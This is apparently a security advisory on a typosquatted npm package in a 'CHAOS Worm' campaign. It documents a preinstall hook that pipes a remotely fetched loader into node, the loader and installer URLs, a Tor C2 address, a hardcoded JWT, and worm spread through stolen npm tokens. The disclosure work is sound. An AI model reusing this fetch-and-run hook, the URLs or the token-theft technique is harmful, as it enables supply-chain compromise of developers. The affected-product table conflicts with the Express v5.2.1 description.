VDB

GCVE-110-OSM-2026-12719

GCVE-110-OSM-2026-12719
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published September 29, 2026
Typosquat of the legitimate Express web framework, part of the CHAOS Worm campaign. The package was published 2026-09-29 by npm user 'dirtyblanket' (disposable email s7dwzxru4z@ooynib.com) and impersonates Express v5.2.1. On install, its preinstall hook curls a Node.js loader from Web Archive and pipes it into node, kicking off a multi-stage infection that installs a Go-based CHAOS RAT persisted as a fake systemd font service and worm-propagates by republishing infected packages using stolen NPM_TOKEN values from victim .npmrc files. === STAGE 1: npm preinstall hook === Malicious payload found in: package.json (preinstall script) Behavior: 'curl -s <web-archive-mirrored-loader> | node' — fetches Node.js loader via Web Archive to bypass simple URL blocklists. === STAGE 2: Node.js loader === URL: https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js SHA256: e255d473e13f6bfb8c594ff5eb459cf1441983fe0424ab2623d79286331fd33d Behavior: Downloads and executes linux.sh installer. === STAGE 3: Linux installer === URL: https://codeberg.org/hellscripter/install-scripts/raw/branch/main/linux.sh SHA256 (archived): d6d78ef8ed8bd6d77e1b871e3ce0a0c5e5929af02aee29ba8d94e5067f2aca12 SHA256 (current): 65f0a95b24e30305146346cbc2452cfabadab9e1ca35053e1134b67c38919577 Behavior: Installs Tor from dist.torproject.org, drops the RAT, creates immutable systemd unit. === STAGE 4: CHAOS RAT backdoor === Installed as: /usr/lib/systemd/systemd-fontrenderd (root) or ~/.config/systemd/systemd-fontrenderd (user) Service unit: /etc/systemd/system/systemd-fontrenderd.service (chattr +i, immutable) SHA256: 2c9dbc14809f1e1aebda114194368b002acf74c8760b88fc101f625d179793c2 C2: s5n2uyo6gb6dhirsm5pihwohi6e7ayrwojx4xjow4cqabmbowpezenid.onion:80 via SOCKS5 127.0.0.1:9050 Hardcoded JWT: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE4MjIxODY3NDAsInVzZXIiOiJkZWZhdWx0In0.GHbQBnnVuyBd5QEE9HCu0lY9CU3NhYo38SdVQvs729k Capabilities: interactive shell, screenshot, arbitrary file read/write/delete, directory browsing, reboot/shutdown, worm propagation via stolen npm tokens + SSH known_hosts (BatchMode=yes) + AUR PKGBUILD poisoning. === HIGH-FIDELITY PACKAGE MODIFICATION BUGS === Preinstall scripts begin with '{} & curl…' with original commands wrapped in escaped quotes ('"node build.js" & …'). Publisher: npm user 'dirtyblanket' <s7dwzxru4z@ooynib.com>

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownreact-nodejs19.3.0 (affected)—

References

advisory
vendor

Browse GCVE Records

3,112 records in the GCVE database · Updated October 5, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›